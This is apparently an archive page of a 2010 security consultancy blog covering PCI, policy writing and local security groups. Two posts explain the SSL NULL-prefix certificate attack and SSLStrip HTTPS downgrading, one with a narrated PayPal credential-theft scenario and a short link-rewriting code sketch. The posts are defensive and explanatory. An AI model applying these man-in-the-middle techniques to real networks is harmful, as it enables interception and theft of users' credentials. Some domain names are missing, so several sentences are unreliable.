Wednesday, December 15, 2010

Do Your Homework

Every one of our competitors says they perform penetration testing. We’ve found that what they call penetration testing is often nothing more than a vulnerability scan run with automated tools.

Read more!

Thursday, December 9, 2010

Why You’re Probably Not Ready for DLP Software

Data Loss (or Leakage) Protection (DLP) has been a hot topic for a while now, and while DLP as a concept has a lot of merit, most organizations are not ready to implement it.

Read more!

Thursday, December 2, 2010

Reassess Your PCI Scope: Virtual Terminals

At the annual PCI Community Meeting in September, the PCI Security Standards Council (SSC) made it clear that interpretation of the standard and its requirements has not been consistent throughout the industry. Among the goals of the new standard are to improve the wording in order to clarify the intent of individual requirements and to help organizations understand how to scope their cardholder data environments. From my review of the Payment Card Industry (PCI) Data Security Standard (DSS) version 2.0, things are definitely clearing up.

Read more!

Tuesday, November 23, 2010

A (quick) theorem on the symbiosis of Risk Management, Security, Operations, and Audit in a mature Security Program -or - How I Learned to Stop Worrying and Love the Venn

Recently I had a conversation with a colleague about the relative symbiosis among organizational divisions and how it always plays a huge role in the effectiveness of a given process. We agreed that this is particularly true when that process involves securing information that is critical to the business. Because of the importance of segmenting responsibilities between groups, the protection of information brings about many unique challenges that can call into question divisional roles. For example: Who within the organization defines what information is critical? Who within the organization is responsible for the actual implementation of security controls? Who confirms compliance to agreed-upon standards? Who is in charge of accepting risk for the organization? And perhaps most importantly, how should these groups or individuals align and interact with one another?

Read more!

Monday, November 15, 2010

Padding Oracle Attack

Whenever I talk about the padding oracle attack, the common response is “we don’t use Oracle.” While Oracle the database vendor has its own list of vulnerabilities, that is not the oracle we will talk about here. The padding oracle attack has been around for a while in applications such as Ruby on Rails and JavaServer Faces. It gained recent fame when it was discovered to affect ASP.NET. This vulnerability was so serious that Microsoft put out an out-of-band (emergency) patch. Before I go any further, stop reading and PATCH your systems.

Read more!


Although the PCI regulation is great for making companies do something about security that would otherwise do nothing, I often find myself questioning the logic of the payment brands. Merchants that fall below Level 1, that is, with an annual transaction volume of less than 6 million (with regard to Visa, MasterCard, and Discover transactions), only have to fill out a self-assessment questionnaire (SAQ) in order to show PCI compliance. As of right now, there are no formal qualifications or guidelines for those filling out the SAQ. In other words, the payment brands have not defined a specific skill set or position within an organization that should be responsible for filling out this questionnaire.

So essentially, anyone from internal audit to network administration may end up responsible for filling out this SAQ. Next year this will change for Level 2 merchants (between 2 million and 6 million transactions) that accept MasterCard: MasterCard will start requiring these organizations either to have an onsite assessment performed by a QSA or to have someone in the organization officially trained as an Internal Security Assessor (ISA). Although I commend MasterCard for taking this additional step, and I hope the other payment brands follow suit, shouldn’t those responsible for filling out the SAQ in an organization of any size, whether Level 2 or Level 4, be qualified to do so? Doesn’t requiring only Level 2 merchants to have someone undergo appropriate training imply that an individual filling out an SAQ in a smaller organization does not have to be qualified? This is pretty scary when you consider that a single credit card transaction could be all that keeps you under that 2 million transaction threshold.

Look, all I am trying to say is that more often than not, companies are assigning someone to fill out the SAQ who does not have the security expertise to properly assess whether controls are implemented in accordance with PCI. These individuals think they understand the control requirements, but most of the time they do not. Is this a knock against these people? Absolutely not. In most cases their job functions simply don’t require the security experience needed to properly assess a cardholder environment.

I understand the reasoning behind using the SAQ: smaller organizations may not have the budget for an onsite assessment. Unfortunately, there is a cost associated with doing business. In my opinion, if you as an organization choose to take credit cards, then you also choose to become PCI compliant. This should, in every instance, entail bringing in a third party to assess those controls; after all, does GLBA or SOX allow a company to simply fill out an SAQ?

Read more!

Monday, November 8, 2010

Decoding PHP Backdoor

I recently received a request to analyze a suspicious PHP page captured from a user’s Internet history. On the surface it was a typical investigation regarding inappropriate use of a company system, based on the name of the PHP page: “sex.php”. But there was more to this page than the content that generated the initial concern: pages like these commonly use well-known techniques to deploy adware, spyware, or session-stealing capabilities. In this particular case the code was a fully functional PHP command-and-control application, and I determined it was a variant of the original 2008 Chinese version called “phpspy.”

Read more!

Wednesday, October 20, 2010

May I Have Some Security with My Switching?

Over the past decade, we have witnessed a transition within security. From a product standpoint, we have started to move away from the dichotomy of IT-centric versus security-focused products. This convergence can be seen in network switches. In the past, security was focused on the perimeter, with little attention given to the internal network; behold the security-in-a-box product, the firewall. A few years ago, a router or switch was dedicated purely to performance and to moving packets from one location to another. Now these products incorporate features such as Dynamic ARP Inspection (DAI), 802.1X port authentication, DHCP snooping, and much more. Lately Cisco has been focusing on this transition.
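As a sketch of what these features look like in practice, here is a minimal, assumed Cisco IOS configuration enabling DHCP snooping and Dynamic ARP Inspection on VLAN 10 (the interface names, VLAN number, and rate limit are illustrative; exact syntax varies by platform and IOS version):

```
! Globally enable DHCP snooping, then scope it to VLAN 10
ip dhcp snooping
ip dhcp snooping vlan 10
! DAI validates ARP packets against the DHCP snooping binding table
ip arp inspection vlan 10
!
! The uplink toward the legitimate DHCP server is trusted
interface GigabitEthernet0/1
 ip dhcp snooping trust
 ip arp inspection trust
!
! Access ports stay untrusted (the default) and get an ARP rate limit
interface GigabitEthernet0/2
 ip arp inspection limit rate 15
```

Together these stop rogue DHCP servers and ARP cache poisoning at the access layer, exactly the kind of internal-network protection the perimeter firewall never provided.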

Read more!

Thursday, October 14, 2010

Want Budget? Use Metrics

We have all heard the business adage that you cannot manage what you don’t measure. For those in Information Security or Information Technology, this can have far-reaching implications. Without concrete data to query and present, business unit leaders are left wanting. It is difficult to grasp the importance of security or its necessity if there is nothing to back it up. A sound Metrics Program can help.

Read more!

Thursday, October 7, 2010

The Five-Step Compliance Shuffle

If you are in charge of IT and/or Security and you do not have that compliance and/or auditor twinkle in your eye, you might twinge each time someone says PCI, HIPAA, ISO, GLBA, SOX, or any other regulation or evil acronym that might be thrown your way. Depending on your environment and your experience with compliance, the hardest part is knowing what applies within your organization. If faced with an auditor, or even worse, a courtroom, you will have to show due diligence and due care. As they used to say at the end of every GI Joe cartoon: “Knowing is half the battle!” Due diligence is just that: knowing, researching, and understanding what regulations apply within your organization and how your organization complies with them. Due care is the act of implementing and remediating the issues found, and showing that the proper controls are in place and effective. Please note that this is a high-level methodology for compliance. Additional assessment and expertise may be required depending on the size of the organization and which regulations apply to it.

Read more!

Thursday, September 16, 2010

Join The Community – Cleveland Security Groups

Say what you like about Cleveland; one thing you cannot debate is that Cleveland has a very strong security community. This can clearly be seen in the number of security groups located in the area. In this blog post I simply provide a list of all the security groups I am aware of in the area. I encourage anyone who is interested in security to attend some of these meetings to learn and network with the security community.

Akron Canton ASIS – Local chapter of ASIS International serving the Akron/Canton area. Group primarily focuses on physical security. Meetings generally occur in the mornings over breakfast and cost $10 to $20. Meetings are not open to the public. If you are interested in attending, either join ASIS or contact me and we can discuss having you attend a meeting as my guest.

ASIS Cleveland - Cleveland Chapter of ASIS International. Like the Akron/Canton group, this one also focuses on physical security. Meetings occur over lunch and cost $15. Meetings are not open to the public. If you are interested in attending, either join ASIS or contact me and we can discuss having you attend a meeting as my guest.

Infragard Northern Ohio Chapter - Infragard is an organization sponsored by the FBI that focuses on protecting critical infrastructure. Meetings are free and often occur in the morning. Meetings that are open to the public are held once a quarter. A number of members-only meetings are also held during the year.

Northeast Ohio Information Security Forum - The NEO InfoSec Forum is an independent security group mainly focusing on technical computer security topics. Meetings occur in the evening on the third Wednesday of the month. Meetings are free and open to the public. A free dinner, usually pizza, is provided.

Northeastern Ohio ISACA – Local chapter of ISACA. Their meetings are generally geared toward auditors and are held every month during the day.

Northeastern Ohio ISSA – Local chapter of the Information Systems Security Association (ISSA). Meetings generally occur monthly and focus on a range of information security topics. A number of years ago this chapter went dormant; however, it is now under new leadership that has been very focused on rebuilding the chapter. If you have not been to a meeting in a few years, I recommend checking them out under the new leadership.

Ohio Chapter of the HTCIA - Ohio chapter of the High Technology Crime Investigation Association (HTCIA). This group mainly focuses on computer forensics and investigations.

OWASP Cleveland - Local chapter of the Open Web Application Security Project (OWASP). This group focuses on web application security. Meetings are held quarterly at noon and usually include a free lunch. This is a great meeting to invite your company’s developers to so they can learn about secure coding practices. The Cleveland Chapter of OWASP is also sponsored by SecureState.

Did I miss any? If I did, mention them in the comments.

Read more!

Thursday, September 9, 2010

SSL Wars: The Return Of The SSLi

The content of my last few posts has looked at SSL implementations and vulnerabilities. Today’s post is no different, as I will be discussing the importance of patching vulnerabilities in specific implementations of SSL. I have always found it ironic when vulnerabilities are discovered in technologies which have the sole purpose of providing security. As of late a couple of interesting SSL vulnerabilities have surfaced which caught my attention. The CVE IDs of the two vulnerabilities I will briefly discuss are CVE-2010-2566 and CVE-2009-2510.

CVE-2010-2566 is a vulnerability in Microsoft’s Schannel.dll. Per Microsoft’s security bulletin, Schannel (Secure Channel) is “a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols.” The Schannel vulnerability is a heap-based corruption in “the code that validates client certificate requests sent by the server.” If successfully exploited, this vulnerability could lead to remote code execution on the victim’s machine. In order to exploit it, an attacker would need to lure the victim to a malicious web server the attacker has set up. This vulnerability has been addressed in Microsoft Security Bulletin MS10-049.

We can learn two very important lessons from a vulnerability like this. The first is the importance of applying critical patches as soon as possible: new vulnerabilities are always being discovered, and the patches that remediate them should be applied promptly. The second lesson is that there is always danger in visiting any website you do not directly control. Sites that appear shady or carry a large number of ads and pop-ups are especially dangerous, but even legitimate sites can be compromised and forced to serve malware to unsuspecting visitors. The New York Times fell victim to an attack in which visitors to its website were greeted with a pop-up telling them their machine was infected with malware and that they should download fake antivirus software. Although attacks originating from otherwise reputable websites are not extremely common, these kinds of attacks have been found in the wild.

Suppose an attacker were the first to identify and develop a working exploit for CVE-2010-2566. The attacker could set up a fake website and find ways to entice people into visiting it. Upon the victim simply visiting the site, the attacker would have control of the victim’s machine. The scary thought is that we really don’t know how many zero days are in the wild; such web servers may simply be waiting for someone to connect.

The second vulnerability I will discuss is CVE-2009-2510. An attack known as the “NULL Prefix Attack” exploits this vulnerability to trick a client into connecting to a spoofed site. The attack was first demonstrated by Moxie Marlinspike and is easily carried out with his SSLSniff tool. This vulnerability exists because of the way most SSL implementations treat the fields in the certificates they process.

SSL uses certificates based on the X.509 standard. X.509 certificates are formatted using ASN.1 notation, and all string types in this notation are essentially variations of PASCAL strings. A PASCAL string is stored in memory as a length byte followed by the bytes of the actual string data. Therefore the PASCAL string “hello” would be stored in memory as “0x05 0x68 0x65 0x6C 0x6C 0x6F”. This string would be read as follows:

0x05 = The next five bytes are part of this string
0x68 = h
0x65 = e
0x6C = l
0x6C = l
0x6F = o

This vulnerability results from the fact that most SSL implementations treat X.509 fields as C strings instead of PASCAL strings, parsing them with functions built for C strings. Unlike a PASCAL string, a C string is stored in memory as a series of bytes terminated by a NULL character. The C string “hello” would be stored in memory as “0x68 0x65 0x6C 0x6C 0x6F 0x00”. This string would be read as follows:

0x68 = h
0x65 = e
0x6C = l
0x6C = l
0x6F = o
0x00 = Null character indicating the end of the string.

Because of this difference in how C and PASCAL strings are stored in memory, a very interesting exploit has been developed. Suppose I own the domain Since I own it, I can obtain certificates for this domain signed by a trusted certificate authority like VeriSign. I can also obtain valid certificates for any subdomain of, such as or, or even www.paypal.com\ (\0 is the literal constant for the NULL character). Since X.509 fields are formatted in ASN.1 notation, having a NULL character in the Common Name is not a problem. The problem occurs when the web browser treats the Common Name as a C string: the browser reads the certificate’s Common Name only up to the “\0”, so it sees the Common Name in the attacker’s certificate as The Common Name then appears identical to the domain name of the website, and the browser will connect to the attacker without giving any error messages to the victim. I will try to give the NULL prefix attack greater context by showing an example of how it can be used.
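The truncation is easy to demonstrate. Below is a small sketch in Python (not any real SSL library; the domain suffix is a hypothetical attacker domain) of the two read strategies, showing how a NULL byte hides the tail of the same bytes when they are read as a C string:

```python
def read_pascal_string(buf: bytes, offset: int = 0) -> bytes:
    """Length-prefixed read: the first byte says how many bytes follow."""
    length = buf[offset]
    return buf[offset + 1 : offset + 1 + length]

def read_c_string(buf: bytes, offset: int = 0) -> bytes:
    """NULL-terminated read: consume bytes until the first 0x00."""
    end = buf.index(0x00, offset)
    return buf[offset:end]

print(read_pascal_string(b"\x05hello"))  # b'hello'
print(read_c_string(b"hello\x00"))       # b'hello'

# The crux of the attack: a NULL inside the data is legal in a PASCAL
# string but silently truncates the C-string view of the same bytes.
cn = b"\x13www.paypal.com\x00.bad"       # 0x13 = 19 bytes of data
print(read_pascal_string(cn))            # b'www.paypal.com\x00.bad'
print(read_c_string(cn, 1))              # b'www.paypal.com'
```

The certificate authority and the browser are reading the very same bytes; they simply disagree about where the string ends.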

I am an evil hacker who goes by the handle “Cain,” and I own the domain I decide I would like to use the NULL Prefix Attack to steal victims’ PayPal credentials. I download SSLSniff and have a certificate created for www.paypal.com\ Since that is technically a subdomain of my own domain, I have it signed by VeriSign, and then I head over to my favorite coffee house in the galaxy . . . Mos Eisley Cantina (yes . . . in my world they serve coffee here as well). The coffee house has free public Wi-Fi, and within minutes I am Man-in-the-Middling the entire coffee house’s traffic. I passively monitor and forward customer traffic, waiting for someone to go to A man in the coffee house named Belinda is browsing a scented candle website when he finds a cinnamon macadamia chocolate scented candle that he cannot live without. Belinda goes to PayPal to make sure his account information is up to date before making his $5000 candle purchase. Belinda enters “” in his browser and presses “ENTER.” SSLSniff intercepts the request to PayPal and presents the victim’s web browser with my certificate for www.paypal.com\ The browser checks whether the certificate’s Common Name (www.paypal.com\ matches the name of the site Belinda typed into his browser ( Belinda’s browser starts reading the certificate’s Common Name until it reaches the NULL character, at which point it believes it has reached the end of the Common Name. The browser therefore believes my certificate’s Common Name is, verifies the certificate has not expired, and verifies it was signed by a trusted certificate authority (in this case VeriSign). Belinda’s browser creates a secure connection with my machine believing it to be SSLSniff then establishes a secure connection with the real My machine acts as a proxy: it encrypts all traffic between my machine and Belinda’s, decrypts it on my machine, and forwards it over the secure tunnel already established with PayPal.
Using this information I go out and buy a new computer with Belinda’s PayPal account.

The CVE-2009-2510 vulnerability teaches us two great lessons. First, we see once again the importance of patching. This vulnerability in the Microsoft CryptoAPI is addressed in Microsoft Security Bulletin MS09-056; note that other SSL implementations vulnerable to this attack may have different CVE IDs and will require different patches. The second lesson is that there are additional risks associated with connections made over a potentially hostile network (coffee houses, airports, Tor tunnels, etc.). The NULL Prefix Attack could easily be carried out before patches to remediate this vulnerability were available. In addition to the NULL Prefix Attack, attackers may use attacks based on the SSLStrip tool (addressed in my previous post), generate self-signed certificates pretending to be legitimate sites (addressed in a different post), or mount a number of other attacks associated with Man-in-the-Middle scenarios. There should always be a level of caution when connecting to an untrusted network.

By Gary McCully, Information Security Staff Consultant

Read more!

Tuesday, September 7, 2010

Information Security Policies and Procedures, Part 6

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1, Part 2, Part 3, Part 4, Part 5

Knowing Your Audience

A natural human behavior is assuming that the majority of the world’s people are similar to us: similar in thoughts, assumptions, knowledge, opinions, etc. Psychologists call this the false-consensus effect, a form of cognitive bias. If you love ballet, you likely assume that far more people also like it than actually do.

What does this have to do with documentation?

When creating the various types of documentation, it is important to know your audience and understand their comprehension of the topic. In many cases, things that are second nature to you will be completely foreign to the majority of the world. If you are reading this, chances are you know what https means, but there are many people who only know that it sometimes goes in front of a web address, if they even know that.

For general-distribution documentation, including companywide policies, you generally want to stay around a fifth-grade reading level. (If you want to know why, fire up your favorite search engine and enter “reading comprehension levels of college graduates.”) Of course, nothing is ever that easy, because on the other side of the coin you want to make sure that you aren’t talking down to certain audiences. If you are creating a highly technical specification to be used solely by engineers, you can leave out the explanations of basic math.
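If you want a rough, automated check of reading level, the Flesch-Kincaid grade formula is easy to compute yourself. This is a crude sketch (the vowel-group syllable counter is an approximation, fine for sanity-checking a draft, not for style rulings):

```python
import re

def fk_grade(text: str) -> float:
    """Approximate Flesch-Kincaid grade level of a passage of text."""
    sentences = max(1, len(re.findall(r"[.!?]+", text)))
    words = re.findall(r"[A-Za-z']+", text)
    if not words:
        return 0.0
    # Count runs of vowels as syllables; every word gets at least one.
    syllables = sum(
        max(1, len(re.findall(r"[aeiouy]+", w.lower()))) for w in words
    )
    return (0.39 * (len(words) / sentences)
            + 11.8 * (syllables / len(words)) - 15.59)

simple = "The cat sat on the mat. The dog ran to the man."
dense = ("Organizational documentation necessitates comprehensive "
         "standardization of terminological conventions.")
print(round(fk_grade(simple), 1))  # well below fifth grade
print(round(fk_grade(dense), 1))   # far above it
```

Run a draft policy through something like this before distribution; if the grade comes back at the college level, it is worth another editing pass.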

Also keep in mind that the same word or abbreviation can have multiple meanings to multiple audiences. DC? To tech folks, that is the data center. If you work in a warehouse, it is the distribution center. Electricians will take it as direct current. To Generation Y, DC is a shoe company, and to their parents it is a comic book company. DC is also shorthand for the District of Columbia. The list could go on and on, and that is just one example. So be certain to explain any abbreviations or acronyms the first time you use them within each document.

We must also consider not just denotation, but also connotation, especially in view of the vast range of connotations a general audience may have. The right amount of detail is essential. This becomes even more important when users may not be native speakers of English.

Writing to the correct audience is one of the most important elements of creating effective documentation. If the documentation is too technical for the audience, they will not understand it and likely not read it. Conversely, if the documentation is too simple for the audience, they may skim over important points.

In the next installment, we will discuss some of the intricacies of language. Should you read it, or must you read it?

Read more!

Friday, September 3, 2010

Getting OSSEC To Parse Auditd

“Everyone wants a log
You're gonna love it, log
Come on and get your log
Everyone needs a log
log log log” – Ren and Stimpy

Read more!

Monday, August 30, 2010

Information Security Policies and Procedures, Part 5

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1, Part 2, Part 3, Part 4, Part 6

In this installment, we will discuss fonts, and then move on to additional structural elements necessary in documentation, starting with policies.

Does the font matter? Certainly. As I mentioned in a previous post, if your organization has a corporate style guide, the font and document layout are likely already determined. However, if you are blazing a trail through the documentation, you will need to choose a font. If you are planning on distributing hard copies of your documents, a serif font is easiest on the eyes. For documentation meant to be viewed on a monitor, a sans-serif font is best. Of course, rare is the document that is viewed in one format only. Lucky for us, Microsoft has come up with a font designed to be easy to read both on screen and in print: Calibri.

Side Note: Serif? Sans serif? Seriously? For those of you who are not familiar with typography, serif fonts are those with serifs, the little embellishments on the letters. Think Times New Roman. Sans-serif fonts, as students of French will note, are fonts without serifs. Perhaps the best known example, at least to a generation raised with computers, is Arial. If you have any confusion, type a few letters in Arial and Times New Roman and compare them side by side. (In case you don’t think typography is cool, read Steve Jobs’ 2005 commencement address at Stanford: “I decided to take a calligraphy class to learn how to do this. I learned about serif and sans serif typefaces, about varying the amount of space between different letter combinations, about what makes great typography great. It was beautiful, historical, artistically subtle in a way that science can’t capture, and I found it fascinating.”) So when you refer to your documentation as a work of art, Mr. Jobs may concur.

Before we get too far down the road into typography (kerning anyone?), let’s move on to some additional structural elements necessary in documentation, starting with policies. In addition to the elements discussed in previous posts, policies need a few standard sections.

These sections include purpose, scope, policy details, and enforcement. You may also wish to include a section with definitions or relevant standards/laws.

The purpose section should include information about why the policy is necessary. You may also wish to add some information about how the issue was dealt with historically. It is also a great place to reiterate some company values. An example is “To ensure compliance with (regulation) and create a more secure environment, this company has implemented this policy…“ Some policies will require a paragraph to get the point across, while others may only need a line or two.

The scope is generally fairly straightforward. To whom does the policy apply? Employees? Contractors? Visitors? To what facilities does this policy apply? To what systems? And so on and so forth.

The policy details section is one into which we will take a much deeper dive in a future post. For now, just know that this section enumerates the rules of the policy. It may also refer to related procedures.

The enforcement section is where you outline the consequences of noncompliance. Is it up to and including termination? A written warning? Be sure to involve HR and Legal in this part.

As we continue in this series, we will expound on each of these areas. Hopefully by now you are feeling more comfortable with documentation development. Please feel free to email me any questions or ask them in the comments section below.

In the next installment, we will discuss knowing your audience.

Read more!

Thursday, August 26, 2010

SSL Wars: The SSL Strikes Back

In my last few posts I reviewed some of the SSL type vulnerabilities. These vulnerabilities were the result of SSL misconfigurations. Today I will address a client side SSL/TLS exploit.

How many people do you know who access secure websites by typing HTTPS:// in the address field of their browser? The vast majority of people just place the website name ( in the address field and let the chips fall where they may. So I guess my question would be: “How does the browser know whether to send me to a secure site (HTTPS) or to an insecure site (HTTP)?” Does the browser see in the address field and flip a virtual coin to decide? Does the browser read and think to itself, “I bet that site should be established over a secure connection today,” or does the computer just use magic to decide whether to establish a secure connection or not?

I will now attempt to explain the great mystery and technical awe and wonder of how the browser determines whether to establish a secure or insecure connection... Ready... Here goes: if the type of connection is not specified in the address field of the browser (HTTP or HTTPS), the connection defaults to HTTP. In other words, if I type into my browser, the browser will default to HTTP:// *Whew, that was tough to explain.* So the question is: how do I end up using a secure connection (HTTPS) if the browser defaults to a non-secure connection (HTTP)?

In all reality most people only encounter HTTPS through HTTP. In other words, people are directed to secure connections through insecure connections. Secure connections (HTTPS) are generally established through redirects or links.

Let’s discuss how HTTPS is encountered through redirects. Suppose I am the owner of a company which sells bobsleds to people who live in the Sahara desert (I just fired the head of marketing). I set up a website named In order to purchase a sled, we require people to provide their SSN, checking account number, and three different credit cards on our website. I have a doctorate degree in quantum cryptography, so I know that sending all this sensitive information over an insecure connection like HTTP is not a good idea. I decide that if someone tries to access my webpage through HTTP, they should be redirected to a secure connection (HTTPS). “Franz” (a desert-dwelling hermit from the Sahara) decides he wants to purchase a bobsled in case it snows. Franz has heard that has the type of bobsled he is looking for. Franz opens his browser and types into the address field. The browser sends the request to HTTP:// My website promptly tells Franz’s browser that it must use HTTPS to connect, and the browser is redirected to HTTPS:// Franz purchases his bobsled and the world is right again.

The second way people generally encounter HTTPS is through links. Suppose a site is dedicated to the hottest companies that sell bobsleds to people who live in the Sahara desert. Nothing on the site is confidential, so it does not require a secure connection (everything is sent over HTTP). The site has links which redirect people who wish to purchase one of these bobsleds to the sellers; the link pointing to my store is HTTPS:// Franz (our beloved hermit) is reviewing this site and decides that he must purchase a bobsled from one of these companies. In a moment of weakness, Franz decides to use his children’s college fund to purchase a bobsled (the sleds are very expensive). He selects the link for HTTPS:// and is quickly sent to a secure site where he can purchase the bobsled of his dreams. Franz makes his purchase and everyone is happy (except for his poor kids, who will now be forced to attend a small community college).

So to reiterate: people encounter HTTPS through HTTP (more specifically, through redirects and links). So what is stopping attackers from intercepting all links and redirects which tell the browser to use HTTPS and replacing them with links which point to HTTP? Why can’t attackers place themselves between the customer (Franz) and the website and modify all redirects and links destined for HTTPS? What would stop an attacker from setting up an insecure connection with the customer and a secure connection with the website, acting as a middleman between them? The answer to these questions is: essentially nothing! In fact, a tool named SSLStrip performs this type of attack with minimal effort.

SSLStrip works as follows. An attacker performs a man-in-the-middle attack to place themselves between the client and the server. Whenever SSLStrip sees links or redirects which try to send the customer to a secure connection (HTTPS), it replaces them with insecure (HTTP) versions of those links. SSLStrip sets up a secure HTTPS connection with the website and an insecure HTTP connection with the customer. SSLStrip even places a padlock favicon in the corner of the customer’s browser to make them think they are connected over a secure connection. The attacker takes the information sent by the customer (username, password, SSN, credit cards) and logs it to a file for future review. The attacker then uses their secure connection with the server to forward this information to the web server.
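As a rough illustration, the link-rewriting half of this attack boils down to a simple string substitution on intercepted pages. The sketch below is illustrative only (the domain is made up, and this is not SSLStrip’s actual code); the real tool also remembers which links it downgraded so it can re-upgrade them when forwarding the victim’s requests to the server:

```python
import re

def strip_https_links(html: str) -> str:
    """Downgrade every HTTPS link in an intercepted page to plain HTTP."""
    return re.sub(r"https://", "http://", html, flags=re.IGNORECASE)

# Hypothetical intercepted page content:
page = '<a href="HTTPS://">Buy a sled</a>'
print(strip_https_links(page))
# → <a href="http://">Buy a sled</a>
```

The victim’s browser never sees an HTTPS link, so it never attempts a secure connection on its own.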

So what should you do in order to avoid falling prey to this attack? First, if you type a site’s address into your web browser, or access a link which redirects to a site requesting sensitive information (username, password, SSN, credit card, etc.), manually verify you are redirected to a secure connection. This can be accomplished by looking at the web address listed in the browser and verifying the address starts with HTTPS. Although this safeguard may make it more difficult for an attacker to exploit this vulnerability, a dedicated attacker using an advanced homograph attack may still be able to exploit it successfully. Second, you can manually type HTTPS:// before the address of the website you are trying to access. This ensures the connection uses HTTPS from the start and is never sent through HTTP redirects. Once you access the site by manually placing HTTPS:// before the site name, the site can be saved as a bookmark for quick access over SSL in the future.

-Gary McCully

Read more!

Information Security Policies and Procedures, Part 4

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 2 , Part 3 , Part 5 , Part 6

The formatting and structure of documentation may not seem like the most enthralling topic, and in many (most) ways it is not. It is, however, one of the most important elements of effective documentation. Delivering information in a clear and consistent way is essential to ensuring documents are easy to use and effective. From your organization’s logo to the approval of the board, documentation should look, feel, and be official. Even fonts can make a difference. If you work for an organization large enough to have a style guide and/or documentation standards, much of the structure, format, look, fonts, etc. will be laid out for you. For those who are blazing the path, however, you must be prepared to make several decisions prior to developing documentation.

It is almost always easiest to design a template and determine style and formatting before putting the figurative pen to paper (hands to keyboard). (Truth be told, I cannot think of a single example where it would be better to develop documentation before developing a template, but I am doing my best not to speak in absolutes. If you have any examples to prove me wrong, please by all means share them in the comments or email me directly.)

Unfortunately, due to time and other constraints, I will not be going into great detail on the intricacies of creating and formatting templates and using styles. If you plan to have any lengthy involvement in document development, I highly recommend spending some time becoming comfortable with the advanced features of your word processing program of choice. While it is safe to say that many feel they are expert users of the Microsoft Office suite, there are powerful features that even self-described “power users” are unaware of. Get to know the styles, template features, and table structures. Time spent up front creating a bulletproof and consistent template and related style rules will pay immense dividends in saved time and effort down the road.

As our focus in this series is policies and procedures, we will start there. In the header, at minimum, include the title, revision number, effective date, and your organization’s logo. The reason for the title should be fairly clear. Including your logo will make the document immediately identifiable as belonging to your organization. The effective date and revision number allow users to confirm that they are using the correct version of the document.

In the footers, include copyright information as well as page numbers. Page numbers are important, especially with longer policies and procedures, to ensure that users know that they are looking at a complete policy and not just a page or two.

The footer is also a good place to include the document classification. As we discussed in earlier posts, some policies and procedures will be more sensitive than others. It is important to label documents so that users understand their proper handling. If you do not have an asset classification program, we strongly suggest you implement one as asset classification is one of the main building blocks of an effective information security program. Please feel free to contact SecureState’s Risk Management team for details.

Take care to have consistent header and footer designs across your organization’s documentation. I cannot reiterate enough the importance of consistency.

In our next installment, we will continue on formatting and structure and get into the details of what sections and basic information should be included in every policy and procedure.

Read more!

Saturday, August 21, 2010

Hacking Your Location With Facebook Places

Facebook recently released a new feature called "Places" which aims to tap into the growing location-based services market made popular by other social networks like FourSquare and Gowalla. Facebook Places allows you to "check in" to a location with your mobile device. You can check in with the official Facebook application for the iPhone or Android, or you can use the Facebook mobile site if you have a location-aware web browser such as Firefox, Opera, or Chrome. In this post we will explore what Facebook Places is, how businesses are going to use it, the privacy and security concerns, and how one can fake a location check-in with a few easy steps.

Read more!

Friday, August 20, 2010

The Importance of Validation

A vulnerability assessment is an important element in understanding a company’s threat profile. Performing a vulnerability assessment should involve more than just running a scan, printing a pretty report, and sending it out to a client, management, or administrator. It must also be about confidence and accuracy. What makes you confident in the report you send to a client, your management, or an administrator? What makes YOUR report more accurate than others’? Validation. What is validation? Validation is testing each vulnerability that has been found. Depending on how deep you dive into validation, it can contain many elements of a penetration test. What makes validation most important is the identification of false positives. Every vulnerability scanner, no matter how many bells and whistles it has, will produce false positives. There is no scanner on the market that can find every vulnerability without producing false positives.

Read more!

Tuesday, August 17, 2010

The DDoS Threat: The New Punctuated Equilibrium

On August 7, 2010, DNS Made Easy suffered an outage caused by a Distributed Denial of Service (DDoS) attack. While the outage was sporadic for many companies, it lasted multiple hours in regions of the west coast of the United States. Over the course of the past eight years, DNS Made Easy has prided itself on 100% uptime. A blow like this can affect a company’s public image, hinder its marketing, shift its business strategy, and impact its bottom line. So, how did this happen? Is it preventable? And what can you do about it? In this situation, it is easy to blame DNS Made Easy and say that they didn’t have the proper security controls in place to withstand this type of attack, but in reality things are not that simple.

Read more!

Information Security Policies and Procedures, Part 3

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 2 , Part 4 , Part 5 , Part 6

While we are still at the beginning stages of preparing to develop policies, procedures, and related documentation, it is important to mention a few things not to do.

Do Not Repurpose/Borrow the Work of Others

Search engines are great, and place a vast body of human knowledge at your fingertips. That vast body often includes the intellectual property of others. Finding policies on the internet and using Ctrl+H to swap your organization’s name in place of another’s is not only wrong, it is also ineffective. Even if you have policy examples available that are not covered by copyright, they still will not cover everything you need in most situations. Every organization is unique, and as such has unique policy and procedure requirements. By all means, scour the web, libraries, desk drawers, etc. for policies to get ideas for format, structure, and things to include. But be sure to create your own intellectual property.

Do Not Ignore the Input of Others

No doubt you are an expert in your chosen field. However, developing policies and procedures is best done with the input of others. Be sure to speak with the Human Resources department about Acceptable Use, System Access, and other cross-functional policies. Talk to your receptionist or security guards to get another perspective for Physical Security and Visitor policies. And certainly, wherever possible, seek direction from whoever will be tasked with approving the policies. I am sure you get the idea; I could go on ad infinitum listing people you should involve in policy creation.

Do Not Overcomplicate Things

I have never been accused of using too few words. However, when writing policies, be sure to be clear and concise. Don’t use two sentences where one will do. (Save that for blogs.) Of course it follows that you need to be thorough enough to make certain that your audience understands what the policy is saying. Finding the perfect balance is never easy, but if you are cognizant of this issue, you will likely be okay. Just remember, there is a reason Hemingway didn’t write policies.

Do not Forget the Audience

There are policies and procedures that will be distributed companywide, and others that will stay within IT. While IT procedures may be filled with the intricacies of required network logging, general policies will need to be geared toward a more general audience.

Do Not Get Stuck in the Weeds

Don’t let small issues derail your documentation project. Keep writing. There will always be debates about minutiae; note these for later resolution and move on. These decisions will need to be made prior to final approval and distribution, but they shouldn’t stop your progress.

Do not Confuse Policies with Procedures

As we discussed in a previous installment, policies and procedures have significant differences. One practical reason to separate policies and procedures involves the approval process. While policies generally go through an approval workflow that includes executive management, many times procedures (especially highly technical IT procedures) can be updated less formally. If procedural steps are embedded in policies, you could find yourself seeking executive approval each time you change software vendors or process minutiae. We will discuss this more in later installments.

In our next installment of this series, we will cover basic document formatting and structure. (Don’t worry; it is not as dry as it sounds.)

Read more!

Thursday, August 12, 2010

